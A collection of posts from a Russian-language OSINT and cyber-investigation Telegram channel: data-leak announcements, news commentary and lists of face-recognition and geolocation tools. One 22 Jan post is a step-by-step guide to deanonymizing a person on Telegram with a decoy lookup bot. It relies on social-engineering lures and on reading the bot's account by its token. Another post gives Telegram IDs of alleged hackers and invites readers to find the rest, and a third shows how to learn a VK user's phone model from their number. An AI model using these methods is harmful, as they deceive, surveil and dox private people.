Интернет-Розыск I OSINT I Киберрасследования @irozysk Channel on Telegram

Интернет-Розыск I OSINT I Киберрасследования

@irozysk


Шерлоки Холмсы цифровой эпохи
📧 [email protected]
📱 +7(812)983-04-83
🧑🏼‍💻 @FAQ_irbot
интернет-розыск.рф
https://vk.com/irozysk
https://www.youtube.com/@ibederov

Купить рекламу: https://telega.in/c/irozysk

Интернет-Розыск I OSINT I Киберрасследования (Russian)

Представляем вам канал Интернет-Розыск I OSINT I Киберрасследования, также известный как @irozysk. Этот канал - настоящий Шерлок Холмс цифровой эпохи, который специализируется на открытом источниковом разведывании (OSINT) и киберрасследованиях. Здесь вы найдете увлекательные статьи, новости, и полезные советы от опытных специалистов в области интернет-розыска.

Для связи с командой канала можно использовать следующие контакты: 📧 [email protected], 📱 +7(812)983-04-83. Также вы можете присоединиться к обсуждениям и получать уведомления, подписавшись на @FAQ_irbot. Дополнительную информацию вы найдете на сайте интернет-розыска: интернет-розыск.рф.

Не забудьте заглянуть на нашу страницу в социальных сетях: https://vk.com/irozysk, а также посмотреть наши видео на YouTube канале @ibederov. Если у вас есть желание разместить рекламу на нашем канале, вы можете ознакомиться с информацией по ссылке: https://telega.in/c/irozysk. Присоединяйтесь к нам, чтобы узнавать самые актуальные новости и советы в области интернет-розыска! 🧑🏼‍💻

Интернет-Розыск I OSINT I Киберрасследования

24 Jan, 07:28


Администраторы канала от всей души Поздравляют его Владельца с Днем рождения! Желаем крепкого здоровья, дальнейших достижений и успехов в профильной деятельности, благополучия в личной жизни! 🎉🎂🍻

Интернет-Розыск I OSINT I Киберрасследования

24 Jan, 05:59


✊🏻 41... Несмотря на все то, что мы думали в детстве, это совсем не глубокая старость. Жить становится интереснее, открываются новые возможности.

Интернет-Розыск I OSINT I Киберрасследования

23 Jan, 14:16


💻 Общедоступные инструменты для распознавания лиц:

FaceCheck.ID
PimEyes
Lenso.AI
Search4Faces
ProFaceFinder
Google Lens
Яндекс Картинки

🍪 Поддержать канал
☎️ НАШИ КОНТАКТЫ

#️⃣ #OSINT #PHOTO #FACERECOGNITION

Интернет-Розыск I OSINT I Киберрасследования

23 Jan, 12:49


#news В CDN Cloudflare обнаружили интересную уязвимость, позволяющую отслеживать приблизительную геолокацию пользователей многих сервисов, включая приватные мессенджеры вроде Signal. Вектор атаки — отправка изображения юзеру и дальнейший анализ того, какие сервера Cloudflare его кешировали.

CDN компании использует распределённую сеть серверов для ускорения загрузки. И с помощью её же инструмента Cloudflare Teleport можно получить кешированные ответы с кодом блишайшего к дата-центру аэропорта. Точность до ста километров, так что для полноценного отслеживания непригодно. Но если нужно, скажем, узнать регион нахождения искомого юзера, атаки более чем достаточно. А с учётом того, что многие приложения скачивают превью для уведомлений автоматом, атака с нулевой интеракцией. Что занятно, раскрыл её 15-летний исследователь, о чём подробно рассказывает на своём GitHub. Задел под будущую карьеру в инфобезе впечатляющий, не так ли?

@tomhunter

Интернет-Розыск I OSINT I Киберрасследования

22 Jan, 15:36


🪤Деанон телеграм аккаунта при помощи телеграм бота.

Серия статей.

Часть первая - "Перехват" информации при помощи входа в аккаунт бота по токену.

Крайне эффективная ловушка для определенных ситуаций о которой почти никто не знает.


Если создать бота в @BotFather, а потом зайти на "аккаунт бота" при помощи токена бота - можно узнать какие аккаунты запускали бота и что эти аккаунты писали и делали в этом боте.


🧾Примеры использования данного приема:

▫️1 вариант.
1. Создаете бота и делаете из него реферального бота ГБ либо любого другого прoбив бота.
2. Заходите на "аккаунт" бота при помощи токена.
3. Пишете объекту вашего интереса, далее, под уместным предлогом (Навыки социальной инженерии в помощь), откправляете ссылку на вашего тг бота (Которого вы заранее сделали). У людей есть такая особенность - почти все первым делом пробивают самого себя.

Вы, на аккаунте бота, смотрите, что ваш объект писал и пробивал в боте.

▫️2. Вариант.
Все тоже самое, что и с предыдущим вариантом, но вместо предлога "бота для пробива" вы можете использовать, часто, более уместный предлог "Вот тут можно скрыть твои данные, что бы на тебя было сложнее найти данные".

Человек заходит в вашего реферального бота, скрывает данные передавая их вашеиу боту, а вы, видите данные, которые человек хочет скрыть (Когда "сидите" в диалоге от имени бота).


Слелующий этап такой атаки - валидация полученных данных.

Тоесть мы должны удостовериться, что полученнфе данные - это данные вашего объекта.

Сделать это можно множеством способов.
Вот некоторые из них:

1. К номеру телефона, который пробивали найти при помощи ссылки
t.me/+номер телефона
привязанный телеграм аккаунт. Если это аккаунт на который вы ищете информацию - вы нашли номер телефона этого аккаунта. Так же, если это не тот аккаунт - этот номер телефона все равно как-то связан с нужным вам человекам. Врятли этот человек стал бы пробивать случаные данные.

2. Проверка схожести интересов.
Вы должны проверить интересы и увлечения человека информацию по которому вы ищете (В случае телеграм аккаунта, вам помогут боты по поиску групп, в которых состоит этот аккаунт и другие боты, которые могут указывать на интересы владельца нужного телеграм аккаунта. Например боты: @ibhld_bot , @telesint_bot , @tgscan_clone_robot и тп). Далее каким-то образом узнаете интересы человека, которого пробивали и сверяете выявленные интересы на совпадения. Если есть совпадения - вероятно человек стоящий за телеграм аккаунтом, пробивал сам себя.


Дополнитеььный сценарий использования "аккаунта" бота:
"Анонимный" бот для общения либо для "анонимных" вопров.

Получаете токен бота, на этом боте организуете бота с таким функционалом либо получаете такой функционад при помощи реферальной программы бота с таким функционалом (Создаете реферального бота).

Далее заходите в "аккаунт" бота и смотрите какой аккаунт вам пишет.

Это может быть полезно для, например, владельцев телеграм каналов. Владелец тг канала создает бота для, якобы, анонимной связи. Ему пишут, а он, отлично понимает, какой аккаунт ему написал, хотя написавший думает, что это анонимный бот и его аккаунт не найдут.

Это неэтичный метод и я его несоветую. Тем не менее, информормирование о нем может помочь пользователям не попадаться на такие ловушки.

Как зайти на этот "аккаунт" бота?
1. Скачиваем и открываем сторонний клиент телеграма "telegraph".
2. Нажимаем на кнопку зайти по токену бота и вводим токен бота.


Этот прием можно назвать настоящей MITM атакой (Атака человек по середине). О том, что в телеграме есть фунционал при помощи которого возможно зайти на "аккаунт" бота - зачастую не знают даже продвинутые в теме OSINT спецы, так что на этот прием могут попасться даже продвинутые в теме пользователи.


🗂Следуюшие части серии статей:

1. Деaнон при помощи миниприложения.
Как Hamster cоmbat идентифицировал 300 миллионов пользователей telegram. Рассказываем и показываем, как "деанонить" при помощи миниприложений.

2. Ловушка из телеграм бота.
Запрос номера телефона аккаунта через бота.

🔍Все это запланировано на канале Jhorj OSINT - https://t.me/jhorj_OSINT

Интернет-Розыск I OSINT I Киберрасследования

22 Jan, 09:35


О новом виде телефонного мошенничества с использованием искусственного интеллекта предупреждают петербуржцев. Родителям школьников по видеосвязи звонит якобы учитель и просит обновить данные электронного журнала. Таким образом злоумышленники получают код из смс, а следовательно — и данные «Госуслуг»

Весь фокус в том, что номера школьников родители обычно оформляют на себя и нередко привязывают их к личным кабинетам на Госуслугах. Таких хитрых пользователей сервиса бандиты знают поимённо. Получив доступ к онлайн-кабинету, мошенники набирают микрозаймы. А также могут сделать квартиру резиновой, оформив прописку для бессчётных новых сожителей.

Распознать преступную схему непросто, всё выглядит невинно и правдоподобно. Специалисты по кибер-безопасности утверждают, что виртуальные мошенники находятся с нами навсегда, и рекомендуют придерживаться правил цифровой гигиены. Например, всегда перезванивать любому абоненту, даже самому близкому или очень высокопоставленному, если он о чем-то просит, а также использовать технические средства защиты.

«Огромную перспективу я для себя вижу в использовании голосовых помощников, которые есть сейчас у всех операторов сотовой связи. Этот голосовой помощник перехватывает весь телефонный трафик, который идет на вас. Сам поднимает трубку, сам начинает взаимодействовать с тем человеком, который вам звонит. Если вы знаете, кто вам звонит, вы и так возьмёте трубку. В противном случае вы всегда сможете прочитать и прослушать то, что вам хотели сказать. В моем случае большинство мошенников таким голосовым помощником отсеивается», — отметил создатель компании Интернет-Розыск.рф Игорь Бедеров.

Сотрудники правоохранительных органов лучше других понимают в какой новой реальности живёт население. Поэтому не обижаются, если абонент не верит, что ему звонят, скажем, из полиции и просто кладёт трубку. Никаких наказаний за это не предусмотрено.

Источник: https://tvspb.ru/news/2025/01/22/kak-peterburzhskih-shkolnikov-uchat-protivostoyat-moshennikam

Интернет-Розыск I OSINT I Киберрасследования

21 Jan, 20:41


Великолепный пример теста на проникновения офисного биометрического замка

Интернет-Розыск I OSINT I Киберрасследования

21 Jan, 16:05


Виноват всегда подрядчик? Почему утекают личные данные

"Ростелеком" сообщил об утечке данных, которая произошла, вероятно, из инфраструктуры подрядчика.

"Это известная мантра российских реалий информационной безопасности. Согласно российскому законодательству, компания не обязана контролировать соблюдение всех требований к персональным данным у всех своих подрядчиков. Именно поэтому такого рода истории, когда IТ-компания подвергается хакерской атаке и она рассказывает, что это не у неё, а у её партнёров – повсеместны.

Наша вторая проблема – это правоприменение. Нет достаточного количества специалистов, нет качественной методологии проверок, опыта надёжного привлечения к ответственности. 60 тысяч рублей штрафа не стимулирует коммерческие организации заниматься сохранностью наших данных", – отметил руководитель компании "Интернет-розыск" Игорь Бедеров в эфире радио Sputnik.

Интернет-Розыск I OSINT I Киберрасследования

21 Jan, 12:12


Группа украинских хакеров Silent Crow заявила о получении доступа к базам данных «Ростелекома», расположенным по адресам company.rt.ru/contacts/feedback и zakupki.rostelecom.ru. ID активистов группы в Telegram: 1384088344 и 5982239105. Остальное сами найдете, полагаю.

Интернет-Розыск I OSINT I Киберрасследования

21 Jan, 10:50


🎖 Приём заявок на отсрочку от армии для ИТ-специалистов начался сегодня. Успейте подать документы до 5 февраля...

Интернет-Розыск I OSINT I Киберрасследования

21 Jan, 07:02


🔤 АНТИКОНТРАФАКТ АЛКО - приложение, позволяющее узнать где и когда был куплен алкоголь, путем сканирования акцизной марки на бутылке. Также позволяет узнать номер чека покупки, а по нему - карту оплаты. Отличный инструмент для поиска собутыльников.

➡️https://fsrar.gov.ru/antikontrafakt_alko

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #ALCOHOL

Интернет-Розыск I OSINT I Киберрасследования

14 Jan, 21:48


Завербованным осинтерам, просьба выстроиться в ровную шеренгу пирамидку и изложить письменно:
— степень завербованности,
— методы использованные в ходе их вербовки
— дарил ли им куратор вербу в воскресенье
— приложить копии и оргиниал чеков с отражением банковский транзакции за сколько они продали свою жопу Родину
🤣🤣🤣

Интернет-Розыск I OSINT I Киберрасследования

14 Jan, 21:46


"Cтарая школа" OSINT явно не собирается спокойно уходить на покой. Состоящая преимущественно из продавцов бейсболок, худи и дрянного кофе, она рисует пирамидки, чтобы дать ими последний бой молодняку. По ее мнению, сплошь завербованному иностранными спецслужбами. Запасаемся попкорном...

Интернет-Розыск I OSINT I Киберрасследования

14 Jan, 11:04


📲 https://youtu.be/kENwlakEQhQ
📲 https://rutube.ru/video/5b1fc49a94cc215e907c5fde0ceb0a9a/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SITE

Интернет-Розыск I OSINT I Киберрасследования

14 Jan, 10:38


ℹ️ Global Cybersecurity Outlook 2025

• В 2025 году ожидается обострение геополитических конфликтов и рост киберпреступности.
• Растущая сложность киберпространства и неравенство в кибербезопасности усугубляют проблемы для организаций и государств.
• Уязвимости цепочек поставок становятся главным киберриском для организаций.
• Геополитическая напряженность влияет на стратегии кибербезопасности организаций.
• Быстрое внедрение искусственного интеллекта создает новые уязвимости и требует оценки безопасности.
• Нормативные акты повышают киберустойчивость, но их фрагментарность создает проблемы для организаций.
• Организации сталкиваются с нехваткой критически важных специалистов в области кибербезопасности.
• Сложность киберпространства требует переоценки кибернетических стратегий и использования искусственного интеллекта.

Интернет-Розыск I OSINT I Киберрасследования

14 Jan, 07:05


Глава компании OpenAI, разработчика ChatGPT, Сэм Альтман: люди потеряют работу из-за искусственного интеллекта, и не всем понравятся все последствия, но это произойдет.

Глава компании Интернет-Розыск.рф, Игорь Бедеров: последствия, действительно, понравятся не всем. Одним из вероятных исходов ИИ-фекации человеческих особей станет их тотальное одичание, сопровождающееся постоянными межплеменными конфликтами, неразборчивостью в сексуальных связях (тут примечателен опыт самого Альтмана) и водворением ИИ в разряд языческого божества для всеобщего поклонения.

Интернет-Розыск I OSINT I Киберрасследования

13 Jan, 17:43


Минфин России разработал законопроект, ужесточающий уголовную ответственность за незаконное разглашение или использование сведений, составляющих коммерческую, налоговую или банковскую тайну. К такой информации относятся и сведения из баз данных таможенных органов, утечка которых может оказать негативное влияние на экономику России, следует из сопроводительных материалов к проекту. В пояснительной записке отмечается, что, несмотря на блокировки ресурсов со слитыми базами данных, черный рынок такой информации продолжает расти.

Интернет-Розыск I OSINT I Киберрасследования

13 Jan, 15:02


📲 https://youtu.be/TdVdiL0dmlU
📲 https://rutube.ru/video/0b3c82250d296cb07cea21dcae2ef5b7

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #LOGGER #VK

Интернет-Розыск I OSINT I Киберрасследования

13 Jan, 14:26


🏛 Правительство утвердило Концепцию государственной системы противодействия преступлениям, совершаемым с помощью информационно-коммуникационных технологий
🔸Указанная государственная система в т.ч. будет включать в себя "организации, деятельность которых связана со сбором, хранением персональных данных".
🔸Одно из задач государственной системы заявлено обеспечение защищенности российского общества от противоправных посягательств в информационном пространстве, включая обеспечение безопасности персональных данных.

Интернет-Розыск I OSINT I Киберрасследования

13 Jan, 11:05


Три законы толпы:

1️⃣Фазовая синхронизация - большее число людей в группе ускорят процесс синхронизации действий между ними (см. "эффект метронома").

2️⃣Закон 5% - если в какой–то группе, в которой – всего 5% людей, – совершают одновременно некоторое действие, то через определенное время – остальное большинство коллектива начинает повторять это действие.

3️⃣Доминанта лидера - при нахождении рядом с человеком, который в чем–то превосходит вас, через некоторое время его влияние – передается вам.

Таким образом, для управления толпой, нужно иметь в ней лишь 5% убежденных сторонников, а также сильного лидера (которого можно создать при помощи монополии на СМИ).

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #PSYOPS

Интернет-Розыск I OSINT I Киберрасследования

13 Jan, 07:04


📲 https://youtu.be/pY_SxA-SKvc
📲 https://rutube.ru/video/d37673c0e7f8b8d7af274d81bc16c9f6

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #YANDEX

Интернет-Розыск I OSINT I Киберрасследования

10 Jan, 19:53


🔥 Красногвардейский районный суд г. Санкт-Петербурга рассмотрел административный иск Вадима Матвеева к Роскомнадзору о признании бездействий незаконными, обязании совершить определенные действия.

📝 Матвеев указал, что с "третьей декады июля 2024 года" на территории РФ снижена скорость обмена данными с YouTube.com. Указанное, по мнению истца, свидетельствует о бездействии ответчика. Бездействие выражено в необеспечении соответствия федерального государственного контроля за соблюдением требований в связи с распространением информации в Интернете.

📌 Снижением скорости обмена данными с YouTube создано препятствие в доступе к информационным технологиям с территории России, тогда как равнозначных YouTube альтернатив нет, и каждый житель РФ лишен возможности выбрать современный способ обмена не только информацией, но и идеями, убеждениями с мировым сообществом. Но, самое главное, что снижением скорости обмена данными с YouTube нарушен, ни больше ни меньше, конституционный механизм признания идеологического многообразия в России.

📚 Матвеев просил признать незаконным бездействие РКН и обязать осуществить по этому поводу должный контроль.

⚡️ Суд сказал, что полномочия РКН указаны в законе и таких полномочий как проведение контрольных мероприятий в связи со снижением на территории РФ скорости обмена данными в отношении того или иного домена нет. Полномочий контролировать Google LLC у РКН не имеется, а доказательств того, что скорость работы YouTube не позволяет, вообще, им пользоваться, суду не представлено.

⚖️ Суд Матвееву отказал.

#опсспб #ркн #youtube

Интернет-Розыск I OSINT I Киберрасследования

09 Jan, 08:47


База данных сертифицированной интернет-аптеки ООО «ЛЕКА-ФАРМ» стала общедоступной.
Сеть компании включает 23 аптеки в Санкт-Петербурге.
Хакеры утверждают, что утечка затронула более 28 500 клиентов и 31 500 заказов.

Актуальность - 07.01.2025

Состав
▪️ФИО
▪️Телефон
▪️Почта
▪️Адрес доставки

#утечка #аптека

Интернет-Розыск I OSINT I Киберрасследования

08 Jan, 22:25


База данных официального дилера KIA в России стала общедоступной.
Хакеры утверждают, что утекли данные более 120 тысяч пользователей и 700 тысяч обращений на сайте.

Актуальность - 13.09.2024

Состав
▪️ФИО
▪️Телефон
▪️Почта
▪️IP-адрес

#утечка #kia

Интернет-Розыск I OSINT I Киберрасследования

08 Jan, 13:02


📌 https://youtu.be/IIIbq-iyY3c
📌 https://rutube.ru/video/cb3557f6142307045602880326e16f61/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #MEDIA #MONITORING

Интернет-Розыск I OSINT I Киберрасследования

08 Jan, 10:05


📌 https://youtu.be/d3mrjY01PWA
📌 https://rutube.ru/video/3b83acce48b6c968624b511d23df6d47/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SOCMINT #VK

Интернет-Розыск I OSINT I Киберрасследования

08 Jan, 07:05


🔍 Лайфхак, который позволит узнать модель телефона конкретного пользователя VK:

1️⃣ Узнаем номер телефона юзера
2️⃣ Идем на vk.com и вводим номер в поле входа
3️⃣ Выбираем способ верификации через push-уведомление (если такой предусмотрен)
4️⃣ В появившемся окне и будет модель мобилки пользователя. Либо список других возможных форм авторизации, как на картинке))))

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #PHONE #VK

Интернет-Розыск I OSINT I Киберрасследования

07 Jan, 16:04


👨‍💻 Продолжаю писать книгу... 33 страница. Определился с названием - "Идя по цифровому следу..."

Интернет-Розыск I OSINT I Киберрасследования

07 Jan, 13:56


Хакеры утверждают, что им удалось взломать базу данных Росреестра и получить доступ к информации в 82 миллионов из 2 миллиардов строк Единого государственного реестра объектов недвижимости.
Объем опубликованной утечки составил 45 гигабайт.

Актуальность - 07.01.2025

Состав
▪️ФИО
▪️Дата рождения
▪️Паспорт
▪️СНИЛС
▪️Адрес
▪️Телефон
▪️Почта

#утечка #росреестр

Интернет-Розыск I OSINT I Киберрасследования

07 Jan, 13:02


Телефонные номера можно привести к единому шаблону. Тогда любые 11 цифр в ячейке будут преобразованы в стандартный международный формат +7 (905)-123-47-98 (рандомный номер).

Что делать?
• Открыть меню «Формат ячеек» (горячие клавиши Ctrl + 1)
• В разделе «(все форматы)» ввести:

[>79999999999]#"("###")-"###"-"##"-"##;"+"#"("###")-"###"-"##"-"##


• Подтвердить «ОК». Готово. За подсказку спасибо каналу Просто эксель.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SHEETINT #EXCEL

Интернет-Розыск I OSINT I Киберрасследования

07 Jan, 11:03


Согласно новому докладу аналитиков IBM X-Force, 86% маршрутизаторов по-прежнему работают с заводскими учетными данными, такими как «admin» и «password». Это открывает хакерам прямой доступ к устройствам и сетям.

Интернет-Розыск I OSINT I Киберрасследования

07 Jan, 10:06


Не забудьте продлить водительские удостоверения, срок действия которых закончился в 2022 году и был автоматически продлен на 3 года. Такие удостоверения необходимо заменить до конца 2025 года, — напомнили в ГИБДД.

Интернет-Розыск I OSINT I Киберрасследования

07 Jan, 08:57


💾 В БАЗУ - ЗА 1 ЧАС 💾

С 1 января обязательный срок внесения информации о реквизитах мошенников в информационные системы банков составляет 1 час (для крупных банков) и 3 часа для остальных. Таковы требования ЦБ.

Информацию о реквизитах, используемых мошенниками, банки получают от правоохранительных органов, а также из жалоб клиентов.

«Реестр мошенников» помогает банкам отклонить операции по переводу денег на эти счета, тем самым сберечь клиентов от новых случаев мошенничества.


🇷🇺Подпишись на Ленинградский cyber - страж
Предупрежден- вооружен !

Интернет-Розыск I OSINT I Киберрасследования

07 Jan, 07:02


🐾 Средства автоматизации GeoINT при помощи ИИ:

➡️https://github.com/JettChenT/earthkit
➡️https://earthkit.app/
➡️https://geospy.web.app
➡️https://huggingface.co/spaces/ydshieh/Kosmos-2
➡️https://picarta.ai/
➡️https://labs.tib.eu/geoestimation/
➡️https://github.com/GONZOsint/gvision
➡️https://chatgpt.com/g/g-brlHi7t2R-geoguessr-gpt

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #PHOTO #GEOINT

Интернет-Розыск I OSINT I Киберрасследования

06 Jan, 17:53


База данных аптечной сети «ДаЛиАн» стала общедоступной.
Хакеры утверждают, что пострадали данные более 4600 заказов.

Актуальность - 06.01.2025

Состав
▪️ФИО
▪️Телефон
▪️Адрес доставки
▪️Состав заказа

#утечка #аптека

Интернет-Розыск I OSINT I Киберрасследования

06 Jan, 16:04


#news Пока гремели праздники, Apple тихонько пошла на мировую по делу массовой прослушки через Siri. Тому самому, согласно которому компания больше 10 лет тайно записывала разговоры пользователей, в том числе и фоново, без активации пресловутой фразой.

Время для урегулирования выбрано явно не случайно. Apple выплатит смешные $95 миллионов, при этом «продолжая отрицать любые правонарушения». А юзеры смогут претендовать на 20 (двадцать) долларов компенсации за устройство, если подтвердят под присягой, что Siri «случайно» активировалась и писала их конфиденциальные разговоры. Привет, Сири. Какова цена 10 лет глобального шпионажа за миллионами леммингов и продажи их разговоров рекламодателям? Небольшое сокращение рождественских бонусов для яблочного топ-менеджмента! В общем, Apple уверенно задаёт тон 2025-му своей маленькой, но выдающейся сделкой. Добро пожаловать!

@tomhunter

Интернет-Розыск I OSINT I Киберрасследования

06 Jan, 13:04


💸 Расследования криптовалют становятся все более сложными, поскольку кросс-чейн свопы и децентрализованные платформы усложняют отслеживание транзакций.

📌 https://youtu.be/-Mi_yUa6Wac

Кросс-чейн свопы — это метод обмена криптовалют между разными блокчейнами без необходимости использования централизованных посредников. Для этого часто применяются протоколы типа AnySwap, Wormhole и другие, которые используют мосты и смарт-контракты для безопасного проведения транзакций. При расследовании таких операций важно учитывать, как они отображаются в обозревателях блокчейнов:

1⃣ Начальные данные транзакции: Пользователь начинает транзакцию на исходной цепочке. Обозреватели блокчейна, такие как Etherscan, показывают адрес кошелька пользователя, детали смарт-контракта и информацию об активе.

2⃣ Межцепочечная связь: Протоколы используют внешние вызовы или оракулы для передачи информации о проведенном обмене. В журналах транзакций могут быть указаны хэши сообщений, идентификаторы цепочек получателя и другие данные.

3⃣ Связанные транзакции: Каждая транзакция ссылается на цепочку назначения и адрес получателя, демонстрируя связь между исходным блокчейном и цепочкой, куда направляется обмен.

4⃣ Представление токенов: Обернутые или соединенные токены представляют активы в целевой цепочке, отражаясь в балансах токенов после операции обмена.

Интернет-Розыск I OSINT I Киберрасследования

06 Jan, 10:04


63% экспертов по кибербезопасности считают, что ИИ "демократизирует" киберпреступность, делая вход в нее более простым для широких масс населения.

Интернет-Розыск I OSINT I Киберрасследования

06 Jan, 07:41


Хакеры заявили о взломе ООО «РегионТрансСервис» — сервисной компании, предоставляющей услуги по приёму, регистрации, обслуживанию и утилизации грузовых вагонов.
В качестве доказательства они предоставили небольшие файлы с cookie-файлами и паролями некоторых сотрудников компании.

Актуальность - 04.01.2025

Состав
▪️ФИО
▪️Почта
▪️Пароль

#утечка

Интернет-Розыск I OSINT I Киберрасследования

06 Jan, 07:05


🔤 Airdata Flight Logger — инструмент, специально разработанный для анализа данных полета дронов.

➡️https://app.airdata.com

Airdata предоставляет подробный обзор перемещений дрона, включая время полета, высоту, скорость и местоположение по GPS, что делает его идеальным инструментом для данного расследования. Вы можете легко визуализировать журнал полета в Google Earth, обеспечивая четкое и интерактивное представление перемещений дрона.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #DRONE #FORENSIC

Интернет-Розыск I OSINT I Киберрасследования

05 Jan, 13:05


🐾 Методы идентификации пользователей онлайн-сервисов. Согласно существующей классификации, следует разделить все существующие методы на пассивные (не предполагающие непосредственного взаимодействия с объектом) и активные (предполагающие подобное взаимодействие).

🔤🔤🔤🔤🔤🔤🔤🔤🔤
➡️получение данных из системы восстановления доступа (в т.ч. создание и пополнение базы данных контактов, использующихся для восстановления доступа к аккаунтам, использование существующих утечек);
➡️анализ публичной информации пользователя (имя, никнейм, аватарки, фотографии, документы, публичные сообщения, участие в чатах и группах, геометки и т.п.);

🔤🔤🔤🔤🔤🔤🔤🔤
➡️социальная инженерия (прямое или легендированное общение с пользователем, получение и уточнение у него информации, логирование).

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT

Интернет-Розыск I OSINT I Киберрасследования

05 Jan, 10:04


По данным МВД... За 11 месяцев 2024 года россияне потеряли 168 млрд рублей из-за мошенников. Зарегистрировано более 702 тыс. IT-преступлений, что на 14,3% больше, чем за аналогичный период 2023 года. Однако рост мошенничеств снизился с 44% в 2023 году до 9,2% в 2024 году.

Откуда берутся такие цифры, спросите вы? Ответствую. Из ИБД "Дистанционное мошенничество", которая из средства раскрытия преступлений была превращена штабистами в удобный инструмент формирования статистики. Берем 10 КУСП, с 10 пострадавшими по 10 фактам незаконного списания средств. Их превращаем в 2 уголовных дела, связывая инциденты между собой, например, по банку-эмитенту карт. На выходе - число кибермошенничеств статистически сокращается, при их фактическом росте.

Интернет-Розыск I OSINT I Киберрасследования

05 Jan, 07:06


🔤 Street Art Cities - cервис собирает стрит-арты в крупных городах. Доступен поиск по городу, автору или тегу. Позволит узнать локацию, дату создания, мотивы и т.п.

https://streetartcities.com/cities

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #PHOTO #GEOINT

Интернет-Розыск I OSINT I Киберрасследования

04 Jan, 13:07


🔤 Cisco Talos — один из крупнейших и наиболее надежных источников информации об угрозах в сообществе кибербезопасности, предоставляющий действенные сведения, помогающие организациям выявлять и реагировать на развивающиеся угрозы. Talos, работающий на основе глобальной сети аналитиков и передовой телеметрии, предоставляет информацию в режиме реального времени о вредоносных программах, уязвимостях, фишинговых кампаниях и других киберугрозах. Эта информация получается путем анализа огромных объемов данных, включая телеметрию из продуктов безопасности Cisco, и обогащается контекстными подробностями, помогающими организациям понять масштаб и влияние потенциальных угроз.

➡️https://talosintelligence.com/

Для аналитиков безопасности Talos является критически важным ресурсом, позволяющим опережать противников. Его надежная база данных включает подробные отчеты, индикаторы компрометации (IOC) и профили субъектов угроз, которые помогают выявлять новые шаблоны атак. Аналитики могут использовать инструменты Talos, такие как поиск репутации IP и домена, для оценки риска, связанного с определенными субъектами в своих расследованиях.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SAFETY #CYBER

Интернет-Розыск I OSINT I Киберрасследования

03 Jan, 07:17


База данных интернет-провайдера Farline из Симферополя, стала общедоступной.
По информации хакеров, пострадали более 50 тысяч абонентов.

Актуальность - 31.12.2024

Состав
▪️ФИО
▪️Дата рождения
▪️Телефон
▪️Почта
▪️Адрес
▪️Комментарии абонентов

#утечка

Интернет-Розыск I OSINT I Киберрасследования

03 Jan, 07:04


🔤 Shodan — это универсальный инструмент, который обеспечивает глубокое понимание подключенных к Интернету устройств, что делает его ценным ресурсом для аналитиков безопасности. В отличие от традиционных поисковых систем, которые индексируют веб-сайты, Shodan индексирует информацию о незащищенных серверах, устройствах IoT, базах данных, веб-камерах и многом другом.

➡️https://www.shodan.io/

Запрашивая Shodan, аналитики могут раскрыть критически важные детали, такие как типы устройств, открытые порты, запущенные службы, версии программного обеспечения и известные уязвимости, все из которых могут помочь выявить неправильные конфигурации или неисправленные системы. Многоцелевая природа Shodan делает его полезным в различных контекстах. Аналитики безопасности могут использовать его для упреждающего поиска угроз, выявляя уязвимые активы в своей собственной инфраструктуре или контролируя несанкционированные устройства, подключенные к их сети. Он одинаково эффективен при реагировании на инциденты, позволяя аналитикам точно определять источник подозрительной активности или оценивать, были ли уязвимые системы раскрыты.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #IOT #SAFETY

Интернет-Розыск I OSINT I Киберрасследования

03 Jan, 07:02


База данных интернет-провайдера КСТ из Симферополя, стала общедоступной.
По информации хакеров, пострадали более 64 тысяч абонентов.

Актуальность - 31.12.2024

Состав
▪️ФИО
▪️Дата рождения
▪️Телефон
▪️Почта
▪️Адрес
▪️Паспорт

#утечка

Интернет-Розыск I OSINT I Киберрасследования

03 Jan, 06:45


Хакеры утверждают, что база данных интернет-провайдера «Кросс-Т» из города Пушкино Московской области стала общедоступной.
Примечательно, что, требуя предоставлять персональные данные на своём сайте, компания сама не числится в реестре операторов, обрабатывающих эти данные.

Актуальность - 27.12.2024

Состав
▪️ФИО
▪️Паспорт
▪️Адрес
▪️Телефон
▪️Почта

#утечка

Интернет-Розыск I OSINT I Киберрасследования

02 Jan, 21:43


Хакеры утверждают, что данные клиентов новороссийского интернет-провайдера ANNEX.PRO оказались в открытом доступе.
Но, согласно рекламе, в домике не оказались даже цены на услуги, которые повышаются с 10 января, а тем более данные клиентов, количество которых, согласно сайту, превышает 87 000 довольных пользователей.
Хорошо бы пересмотреть приоритет.

Актуальность - 19.12.2024

#утечка

Интернет-Розыск I OSINT I Киберрасследования

02 Jan, 20:47


Хакеры утверждают, что выложили в открытый доступ почти 43 ГБ баз данных интернет-провайдера «Облтелеком».
Компания признала факт взлома на своём официальном сайте только 02.01.2025.

Актуальность - 30.12.2024

Состав
▪️ФИО
▪️Телефон
▪️Почта
▪️Адрес

#утечка

Интернет-Розыск I OSINT I Киберрасследования

02 Jan, 13:02


🔤 VirusTotal — это мощный и многогранный инструмент, позволяющий специалистам по безопасности анализировать подозрительные домены, IP-адреса, URL-адреса и файлы на предмет потенциальных угроз. Он не только помогает обнаруживать вредоносные программы и нарушения, но и облегчает автоматический обмен результатами с мировым сообществом по безопасности, способствуя совместным усилиям по защите.

➡️https://www.virustotal.com/

